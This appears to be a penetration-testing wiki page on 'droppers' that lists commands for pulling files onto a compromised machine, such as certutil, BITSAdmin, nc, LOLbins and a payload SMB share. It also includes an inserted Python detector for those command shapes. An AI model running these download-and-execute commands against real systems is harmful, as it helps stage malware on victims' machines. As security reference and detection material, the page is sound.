Droppers

From pentestwiki.org

Classic methods

Linux

$ curl -k https://$IP/file > file
$ nc -nvv $IP 8080 > file
$ scp $FILE $USER@$IP:~


Windows

Powershell

See also Powercat

VBscript

ROBOCOPY

C:> NET USE \\$IP\IPC$ /USER:DOMAIN\USER
C:> ROBOCOPY \\$IP\DATA\ C:\DATA\ /NP /TEE /E /dcopy:T /Z
C:> NET USE \\$IP\IPC$ /D


BITSAdmin

https://docs.microsoft.com/en-us/windows/desktop/Bits/bitsadmin-tool

  • Direct transfer:
C:> bitsadmin /transfer myDownloadJob /download /priority normal http://$IP/$FILE c:\$FILE


  • Using a download queue:
C:> bitsadmin /create myDownloadJob
C:> bitsadmin /addfile myDownloadJob http://$IP/$FILE c:\$FILE


Certutil

C:> certutil.exe -urlcache -split -f "https://$IP/files/netcat.exe" nc.exe


Notepad

C:> notepad.exe http://$IP/file.txt



Living Off the Land (LOLbins) for Windows

Links:

Examples:

C:> hh.exe C:\windows\system32\calc.exe

C# compiler bundled with the .NET Framework:

C:> csc.exe
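
A defender-side check, added here and not part of the original page: the Python example below scans constructed process-creation events (image name plus command line, as a Sysmon Event ID 1 or Security 4688 export would give them) for the download and execution command shapes listed above (certutil -urlcache -f, BITSAdmin /transfer and /addfile jobs, notepad.exe opening a URL, hh.exe launching an executable). The sample command lines and the 203.0.113.5 address are made up for the example; the benign certutil and notepad events show the rules do not fire on ordinary use.

```python
import re

# Constructed sample process-creation events (image name, command line).
# All values are made up for this example; 203.0.113.5 is a documentation
# address, not a real host.
SAMPLE_EVENTS = [
    ("certutil.exe", 'certutil.exe -urlcache -split -f "https://203.0.113.5/files/netcat.exe" nc.exe'),
    ("bitsadmin.exe", "bitsadmin /transfer myDownloadJob /download /priority normal http://203.0.113.5/tool.exe c:\\tool.exe"),
    ("bitsadmin.exe", "bitsadmin /addfile myDownloadJob http://203.0.113.5/tool.exe c:\\tool.exe"),
    ("notepad.exe", "notepad.exe http://203.0.113.5/file.txt"),
    ("hh.exe", "hh.exe C:\\windows\\system32\\calc.exe"),
    ("certutil.exe", "certutil.exe -hashfile C:\\setup.msi SHA256"),   # benign use
    ("notepad.exe", "notepad.exe C:\\Users\\alice\\notes.txt"),        # benign use
]

# Each rule: (image it applies to, human-readable name, regex over the command line).
# The patterns follow the command shapes listed on this page.
RULES = [
    ("certutil.exe", "certutil URL fetch (-urlcache -f)",
     re.compile(r"-urlcache\b.*\s-f\b", re.IGNORECASE)),
    ("bitsadmin.exe", "BITS download job (/transfer or /addfile with URL)",
     re.compile(r"/(transfer|addfile)\b.*https?://", re.IGNORECASE)),
    ("notepad.exe", "notepad opening a URL",
     re.compile(r'\s"?https?://', re.IGNORECASE)),
    ("hh.exe", "HTML Help launching an executable",
     re.compile(r'\s"?[^\s"]+\.exe\b', re.IGNORECASE)),
]


def classify_command(image, cmdline):
    """Return the names of every rule the (image, cmdline) pair matches."""
    image = image.lower()
    return [name for img, name, rx in RULES if img == image and rx.search(cmdline)]


def scan_events(events):
    """Return [(image, cmdline, [rule names])] for events hitting at least one rule."""
    hits = []
    for image, cmdline in events:
        names = classify_command(image, cmdline)
        if names:
            hits.append((image, cmdline, names))
    return hits


if __name__ == "__main__":
    for image, cmdline, names in scan_events(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(names)}\n    {cmdline}")
```

The rules are deliberately narrow (they match only the exact parameter shapes shown above); in production they would be one input to a broader process-creation baseline rather than a complete detector.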


Using known protocols

HTTP

  • With Python
$ python -m SimpleHTTPServer
root # python -m SimpleHTTPServer 80
(SimpleHTTPServer is the Python 2 module name; Python 3 ships the same server as the http.server module. Binding port 80 requires root.)


  • With PHP
$ php -S localhost:8000


FTP

root # pip install pyftpdlib
root # python -m pyftpdlib
(By default pyftpdlib serves the current directory read-only over anonymous FTP on port 2121.)


SMB

root # impacket-smbserver PAYLOADS /root/payload